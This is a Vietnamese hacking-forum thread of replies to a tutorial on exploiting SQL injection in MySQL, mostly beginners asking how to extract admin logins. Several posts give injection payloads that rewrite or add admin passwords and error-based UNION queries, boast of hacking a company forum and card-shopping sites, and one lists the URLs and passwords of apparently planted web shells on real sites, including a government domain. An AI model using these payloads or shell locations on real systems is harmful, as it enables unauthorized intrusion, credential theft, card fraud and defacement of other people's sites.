Joined: 13/11/2010 13:44:55
Bài gởi: 17
Offline
[Profile] [PM]
em vừa gặp một trang dùng mySQL mà em đã tiến hành khai thác nó. đã ra cái username và pass của admin (pass không mã hoá) nhưng mà sao em ko thể dùng cái acc này để đăng nhập được như những acc thông thường (toàn báo sai username hoặc pass). vậy các anh có thể chỉ cho em là tại sao như thế không ạ. em là newbie mong các anh nhẹ nhàng góp ý.
ps: lúc đăng nhập trang này ngoài yêu cầu name và pass còn thêm phần mã ảnh để đăng nhập, các anh giải thích giùm em luôn là mã ảnh đó để làm j nữa.thanks
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 25/03/2011 18:59:17 (+0700) | #78 | 233951
NT08
Member
[Minus] 0 [Plus]
Joined: 20/01/2011 21:22:23
Bài gởi: 4
Offline
[Profile] [PM]
Sau khi biết đc tên database và user nhưng nó dấu link admin (hoặc chặn ip truy cập vào Admin) thì làm thế nào các bác?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 05/04/2011 10:25:35 (+0700) | #79 | 234725
nqthangonline
Member
[Minus] 0 [Plus]
Joined: 03/12/2004 16:45:44
Bài gởi: 3
Offline
[Profile] [PM]
@all newbie : google kiếm ebook hacking cc của hieuitpc mà đọc mà ngẫm cho kĩ nếu vẫn không hiểu thì đừng vào đây hỏi nữa nqthangonline cũng vào đây từ lâu lắm rồi mà chẳng giám hỏi gì nè hj hj
@seamon : được gặp thầy ở đây hjhj
[Up] [Print Copy]


[Bài viết] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 03/06/2011 10:24:33 (+0700) | #80 | 238613
[Avatar]
classical
Member
[Minus] 0 [Plus]
Joined: 02/06/2011 22:39:07
Bài gởi: 1
Đến từ: HN
Offline
[Profile] [PM]
h0ainiemdauyeu wrote:
lỗi này bây giờ đã fix hết rồi ,kiếm site bị lỗi kiểu này thực tập khó quá smilie

E cũng nghĩ thế! Nhưng e thấy bài viết này hữu ích quá smilie Biết cách còn đề phòng smilie
Ai đừng một dạ 2 lòng
Đừng chê chân ngắn, đừng than chân dài
Chân dài là của đại gia!
Đùi to, chân ngắn mới là vợ anh. smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 19/06/2011 20:16:20 (+0700) | #81 | 241419
[Avatar]
minhhath
Member
[Minus] 0 [Plus]
Joined: 22/11/2010 10:03:38
Bài gởi: 91
Đến từ: Team unknow
Offline
[Profile] [PM]
bài viết chỉ hướng dẫn Khai thác SQL Injection trong Basic PHP Events Lister 1.0 nhưng còn trong ASP.net viết bằng ngôn ngữ C# thì em thấy áp dụng cách trên không có tác dụng gì anh nào pro chỉ em cái nha.
Thanks đã đọc bài viết này
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 24/06/2011 12:24:07 (+0700) | #82 | 241970
Yun.s2IM
Member
[Minus] 0 [Plus]
Joined: 05/06/2011 07:08:54
Bài gởi: 1
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/07/2011 08:56:51 (+0700) | #83 | 244429
nguyendhus
Member
[Minus] 0 [Plus]
Joined: 20/07/2009 10:18:26
Bài gởi: 1
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 12/09/2011 15:51:28 (+0700) | #84 | 246933
hachoa59
Member
[Minus] 0 [Plus]
Joined: 11/09/2011 23:49:01
Bài gởi: 9
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/11/2011 22:19:35 (+0700) | #85 | 250103
rongxau
Member
[Minus] 0 [Plus]
Joined: 11/04/2008 21:53:35
Bài gởi: 1
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 20/11/2011 01:26:30 (+0700) | #86 | 250138
[Avatar]
tvv
Member
[Minus] 0 [Plus]
Joined: 03/06/2011 07:41:21
Bài gởi: 55
Đến từ: TP HCM
Offline
[Profile] [PM] [WWW]
Cảm ơn bài viết của anh Seamoun .Nhờ bài viết của anh em mới phần nào hiểu được cách thức hoạt động của mấy cái tool SQL Injection .Hy vọng là xẽ có nhiều bài như vậy nữa smilie .
Chỉnh lại chút : Đọc xong bài này có nhiều câu hỏi và câu trả lời vui thật .Em đọc giữa khuya mà cười ko chịu nổi .Thank tất cả !
https://www.youtube.com/channel/UCDeTtfediXlQmnw1kdOeHEw?feature=mhee
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 21/11/2011 17:15:08 (+0700) | #87 | 250184
[Avatar]
he0k0n
Member
[Minus] 0 [Plus]
Joined: 02/11/2011 01:07:17
Bài gởi: 42
Offline
[Profile] [PM]
tuy e mới vào forum nhưng theo e biết thì diễn đàn này được lập ra là để a e học tập là chính chứ không phải phá hoại! mong a e đừng có nhờ hack cái site này hay là deface cái site kia!(có sai gì mong a e bỏ qua cho thank! )
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/03/2012 09:36:51 (+0700) | #88 | 256385
[Avatar]
Yona
Member
[Minus] 0 [Plus]
Joined: 27/02/2012 07:58:43
Bài gởi: 3
Offline
[Profile] [PM]
Cám ơn các anh em đang rất thích cái món này ! Hix thank các anh ha !
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/03/2012 21:42:11 (+0700) | #89 | 256525
[Avatar]
punkrock
Member
[Minus] 0 [Plus]
Joined: 22/03/2007 19:15:25
Bài gởi: 9
Offline
[Profile] [PM] [Email]
hihi. hôm nay mới hack đc forum BB công ty mình nhờ cái sql injection này smilie. hacking thật là thú vị.

Admin
Admin

Tổng số bài gửi : 69
Join date : 13/09/2018

Xem lý lịch thành viên http://hvaonline.forumvi.com

Về Đầu Trang Go down

Re: [Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Bài gửi by Admin on Thu Sep 13, 2018 11:27 am


zeropoint
Member
[Minus] 0 [Plus]
Joined: 14/02/2012 08:11:31
Bài gởi: 24
Offline
[Profile] [PM]
caotrienx wrote:
Mình hack được user/pass: admin:57c4b03b07d5b098b92a0205dcca66d5 chuỗi md5 này ko giải mã được

Theo 1 bài viết có cách hướng dẫn đổi pass hoặc record 1 newuser/newpass(newpass được đã được giải mã) khi biết được các table va column
Để thay đổi password , có thể làm như sau:
http://yoursite.com/index.php?id=10 UPDATE 'admin_login' SET 'password'= 'newpass' WHERE login_name='admin'--

Hoặc nếu bạn muốn một record mới(tạo một newuser/newpass) vào table:
http://yoursite.com/index.php?id=10 INSERT INTO 'admin_login'('login_id', 'login_name', 'password') VALUES(`1`,'admin1','newpass')--

mình thử nhưng ko được kể cả khi chuyển login_name sang hex newuser=admin1=61646d696e31

INSERT INTO 'admin_login' ('login_id', 'login_name', 'password') VALUES
(`1`, `0x61646d696e31`, `bf15876b12c0a194dcb842c3ec9cb078`)--

Ai cho mình biết sai ở đâu ko!

Nói chung MySQL không phân biệt được lệnh bạn viết gì! vì phía sau select mà thêm câu lệnh insert,update, delete là sai vì phía sau nó là where hoặc union nói đơn giản là Nên học câu lệnh truy vấn trong SQL đi!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 07/03/2012 01:55:00 (+0700) | #92 | 257067
onelove88
Member
[Minus] 0 [Plus]
Joined: 04/08/2011 11:50:31
Bài gởi: 2
Offline
[Profile] [PM]
cho em hỏi cái em dùng SQL sever 2005 ,em dùng phần mềm SQL Server Management Studio Express để code

em dùng câu lệnh sau:
select * from san_Pham union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden

lỗi hiên trên SQL Server Management:
Conversion failed when converting the nvarchar value '123456a' to data type int.

nhưng khi em chèn mã lệnh vào :http://localhost/theGarden/DetailProduct.aspx?id=7 union select convert(int,GardenpassWorld+'a'),'1','1','1','1','1','1' from admin_Garden

lôi hiên trên trình duyệt: Incorrect syntax near 'a'.
cho em hỏi sao lại báo lỗi khác nhau thế ạ ,vì câu lệnh sau thì báo lỗi giống nhau

select * from san_Pham union select stuff(GardenpassWorld,1,1,'a'),'1','1','1','1','1','1' from admin_Garden

Conversion failed when converting the nvarchar value 'a23456' to data type int.

Em đánh sai gì mong các anh thông cảm
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 13/04/2012 10:09:34 (+0700) | #93 | 261295
[Avatar]
thanhhuy12th
Member
[Minus] 0 [Plus]
Joined: 11/04/2012 21:23:23
Bài gởi: 1
Offline
[Profile] [PM] [Yahoo!]
Bài viết rất hay để tham khảo nhưng:

"From: louisnguyen27: @seamoun như vậy social engineering là rất quan trọng trong việc khai thác lỗi. Có khi nào đoán hoài mà vẫn không ra tên bảng và các trường không?"

Lúc đầu có lỗi " chỗ sau id=1 thêm ' " thì mới khai thác lỗi được, còn không nếu không xuất hiện thì......Never nhĩ???
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 14/04/2012 19:27:52 (+0700) | #94 | 261398
zeropoint
Member
[Minus] 0 [Plus]
Joined: 14/02/2012 08:11:31
Bài gởi: 24
Offline
[Profile] [PM]
Một câu hỏi rất hay chủ yếu là ta phải đoán được họ dùng câu lệnh truy vấn như thế nào và họ fix chưa? Nếu fix rồi thì đoán cách họ đang fix từ đó ta mới quyết định đi tiếp hay dừng lại!

Bài viết chỉ mang tính tổng quang mà thôi còn việc áp dụng thì còn phải dự vào bản thân và kinh nghiệm về truy vấn Cơ Sở Dữ Liệu nữa!

[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 01/05/2012 19:41:12 (+0700) | #95 | 262259
chimung
Member
[Minus] 0 [Plus]
Joined: 23/10/2008 22:23:45
Bài gởi: 24
Offline
[Profile] [PM]
E thấy chủ đề hay thế này mà có nhiều câu hỏi vu vơ quá nên mạo muội hỏi các bậc đàn anh:"Ngoài việc dùng order by để tìm số cột lỗi còn có cách khác ko?"
P/s:Sao người viết lại sử dụng union select 1,1,1,1,... để xác định cột lỗi thay vì union select 1,2,3,4 vậy?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 02/05/2012 08:20:12 (+0700) | #96 | 262293
havuanhle
Member
[Minus] 0 [Plus]
Joined: 27/03/2011 01:32:03
Bài gởi: 4
Offline
[Profile] [PM]
Khi get user name với database name, nhưng get table lại dính 403 thì làm sao nhỉ?
Và một số site khi query lại hiện trang trắng kèm lỗi, có cách nào khai thác được không ạ
Mong các bác giải đáp.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 04/06/2012 10:05:47 (+0700) | #97 | 264598
[Avatar]
anti-love
Member
[Minus] 0 [Plus]
Joined: 30/04/2012 12:08:18
Bài gởi: 9
Offline
[Profile] [PM]
Thực ra bài viết này rất bổ ích
nhưng trường hợp lỗi SQL kiểu này thì chỉ xuất hiện ở một số wwebsite nhỏ, có cơ chế bảo mật không tốt.
chứ nhưng site to con thì hầu như không thể khai thác đc SQL kiểu này
Mà phải tìm qua lỗi củA Email admin hoặc used của member để khai thác.
luk nào có thời gian mình sẽ post lên cho mọi người tham khảo
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 28/06/2012 18:20:47 (+0700) | #98 | 265713
zeropoint
Member
[Minus] 0 [Plus]
Joined: 14/02/2012 08:11:31
Bài gởi: 24
Offline
[Profile] [PM]
Đâu nhất thiết phải tìm cột đâu bạn? Không cần biết cột vẫn có thể truy vấn dữ liệu được mà!(blind)

Còn tại sao select 1,1,... khác select 1,2,... thì bạn cứ thử đi rồi bạn sẽ thấy khác biệt.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 28/06/2012 21:34:57 (+0700) | #99 | 265720
zeropoint
Member
[Minus] 0 [Plus]
Joined: 14/02/2012 08:11:31
Bài gởi: 24
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 29/06/2012 12:43:00 (+0700) | #100 | 265764
kakarottbatdong
Member
[Minus] 0 [Plus]
Joined: 02/05/2009 19:27:06
Bài gởi: 55
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 14/04/2013 18:17:30 (+0700) | #101 | 274935
khicon2893
Member
[Minus] 0 [Plus]
Joined: 17/01/2013 22:10:29
Bài gởi: 1
Offline
[Profile] [PM]
e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON
MD5 !! dùng findmyhash mà giải mã cậu ah!!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 15/04/2013 08:51:02 (+0700) | #102 | 274947
Kikirum
Member
[Minus] 0 [Plus]
Joined: 07/07/2011 08:33:44
Bài gởi: 1
Offline
[Profile] [PM]
khicon2893 wrote:
e8772a36a8f284c2060a70d16cb7d03a -> DAITHIENSON
MD5 !! dùng findmyhash mà giải mã cậu ah!!

Dạo này còn hack shop lấy đc cc không bác, mình đọc mấy ebook của hieupc ,tìm hiểu thêm trên mạng nữa , shop lỗi thì tìm ra nhưng mà làm theo mấy cái code của hiếu pc thì nó chẳng ra cái colum nào cả. hic...
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 07/05/2013 08:26:55 (+0700) | #103 | 275513
manh.kqha
Member
[Minus] 0 [Plus]
Joined: 23/04/2013 03:14:15
Bài gởi: 9
Offline
[Profile] [PM]
Anh Ad ơi.
Ngoài hướng khai thác lỗi thông qua kiểm tra bằng dấu "'" sau chuỗi truy vấn này, về SQL Injection có những hướng khác không?
Ad hướng dẫn anh em các phương pháp khác đi.
Bây giờ tìm được mội site mắc lỗi này đề test cũng không dễ.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 07/05/2013 12:22:46 (+0700) | #104 | 275525
hacking.zombie
Member
[Minus] 0 [Plus]
Joined: 19/03/2013 22:39:42
Bài gởi: 5
Offline
[Profile] [PM]
Bây giờ mình thấy đều sử dụng framework để truy xuất database ví dụ django của python, rail của ruby,.. vậy tại sao vẫn bị lỗi SQL ??? Mình lập trình ứng dụng mạng nhưng mới chạy local host không hề có đoạn code SQL nào.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 22/06/2013 09:14:09 (+0700) | #105 | 276783
ken002
Member
[Minus] 0 [Plus]
Joined: 12/01/2009 14:16:40
Bài gởi: 29
Offline
[Profile] [PM]
Vậy nếu url đã rewrite thì làm thế nào hả bác?
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 26/06/2013 05:44:40 (+0700) | #106 | 276912
sparrowvn
Member
[Minus] 0 [Plus]
Joined: 12/03/2012 21:21:05
Bài gởi: 12
Offline
[Profile] [PM]
URL rewrite cũng khai thác như bình thường ban xem link này nhé https://www.youtube.com/watch?v=ROu2DclkMAY, mặc dù link cũ nhưng vẫn thế. Mình đã check site này vẫn đang bị sql nhưng ngạc nhiên là vẫn được báo là Vulnerability free. Hài thật
Test lỗ hổng web : http://iwast.securitas.com.vn
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 11/11/2013 20:08:06 (+0700) | #107 | 278988
hocquantrimang
Member
[Minus] 0 [Plus]
Joined: 05/11/2013 22:58:19
Bài gởi: 2
Offline
[Profile] [PM]
đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 19/11/2013 23:38:50 (+0700) | #108 | 279040
sparrowvn
Member
[Minus] 0 [Plus]
Joined: 12/03/2012 21:21:05
Bài gởi: 12
Offline
[Profile] [PM]
hocquantrimang wrote:
đối với bài này là làm bằng tay nên có thể hơi mất công và khó nhớ, nhưng làm = tay cung có cái hay của làm bằng tay, nhiều khi làm = tools ko ra nhưng làm bằng tay lại ra. với bài này thì ta có thể dùng tools Havij để search sẽ rất nhanh có thể thấy được admin và mkMD5, cả link admin nữa, nhưng mã MD5 thì hên xui thôi, xài python trong backtrack còn xin lỗi chịu ko nổi chứ nói gì đến google mêt nghỉ, xài dictionary thì cũng 50/50 :v ko nói chắc được, vậy nên việc tìm kiếm password của admin thì mức độ khả thi vẫn là 50-50/ thế nên mới sinh ra việc khai thác web cho phép upload để đưa shell lên rồi chạy shell để chiếm quyền admin sau đó change pass của admin = pass đã được MD5 của mình vào, => mình là admin rồi , từ đó mới tấn côn các web khác. nhưng chỉ riêng việc upshell và chạy được nó đã là 1 điều ko đơn giản rồi.

Do trong giới hạn của bài viết và yêu cầu, nên mình không muốn bình phẩm về chuyện tay hay tool. Về nguyên tắc thì tất cả những gì user có thể input đều sẽ được đưa vào ứng dụng, tuỳ theo ứng dụng có thể điểm input sẽ khác nhau và tất nhiên tuỳ theo khả năng nhận biết cùa hacker hoặc người muốn test. Skill và experience là những yếu tố mấu chốt đối với tester cũng như hacker
Về chuyện tool hay tay, các bạn có thể xem 1 bài viết (khá cũ nhưng vẫn xem được) tại http://www.slideshare.net/itasvietnam/itasautomated-web-applicationscannervi. Các quyết đị tool nào hay tay nào sẽ là quyết định của chính bạn
Test lỗ hổng web : http://iwast.securitas.com.vn
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 09/12/2013 21:54:55 (+0700) | #109 | 279198
[Avatar]
vipluckystar
Member
[Minus] 0 [Plus]
Joined: 13/12/2011 10:08:18
Bài gởi: 1
Offline
[Profile] [PM] [Yahoo!]
Cho mình hỏi mình chiếm quyền quản trị và upload shell thành công nhưng lại ko login được vào shell dù đã đúng user/pass hay bỏ code check đi thì phải làm sao?
demo:
http://pscells.net/upload/sanpham12.php hacker
http://pscells.net/upload/sanpham18.php imhacker/fogetit
http://pscells.net/upload/test.php /
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 28/04/2014 13:46:40 (+0700) | #110 | 280497
hackermiennui
Member
[Minus] 0 [Plus]
Joined: 24/04/2014 08:31:17
Bài gởi: 1
Offline
[Profile] [PM]
http://thutuchanhchinh.daknong.gov.vn/uploads/files/T4_2014/shell.asp
pass: a1b
Làm gì khi có cái này
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 09/08/2014 22:27:05 (+0700) | #111 | 281257
[Avatar]
mrminhlong
Member
[Minus] 0 [Plus]
Joined: 07/08/2014 00:20:41
Bài gởi: 1
Offline
[Profile] [PM]
các bác có nghĩ là 1 site có lỗi SQL injec nhưng lại không tìm đk table users của nó không? em tình cờ khai thác đk lỗi này trên 1 site nhưng khi truy vấn thì không thấy users smilie

Admin
Admin

Tổng số bài gửi : 69
Join date : 13/09/2018

Xem lý lịch thành viên http://hvaonline.forumvi.com

Về Đầu Trang Go down

Re: [Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Bài gửi by Sponsored content


Sponsored content


Về Đầu Trang Go down

Về Đầu Trang

- Similar topics

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết